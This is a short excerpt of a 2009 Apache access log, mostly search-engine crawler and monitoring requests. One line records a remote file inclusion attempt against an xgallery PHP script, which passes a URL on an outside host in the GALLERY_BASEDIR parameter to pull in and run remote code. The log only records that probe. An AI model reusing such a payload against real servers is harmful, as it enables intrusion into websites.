72.30.78.244 - - [12/Jul/2009:02:05:17 -0400] "GET /logs/access_log.Q107072700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.188 - - [12/Jul/2009:02:05:19 -0400] "GET /logs/access_log.Q109052900//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:02:05:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.78.244 - - [12/Jul/2009:02:06:06 -0400] "GET /logs/access_log.Q109070800 HTTP/1.0" 200 4336924 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.70 - - [12/Jul/2009:02:07:00 -0400] "GET /images/items/7473003_thumb.jpg HTTP/1.1" 200 2263 "-" "Googlebot-Image/1.0"
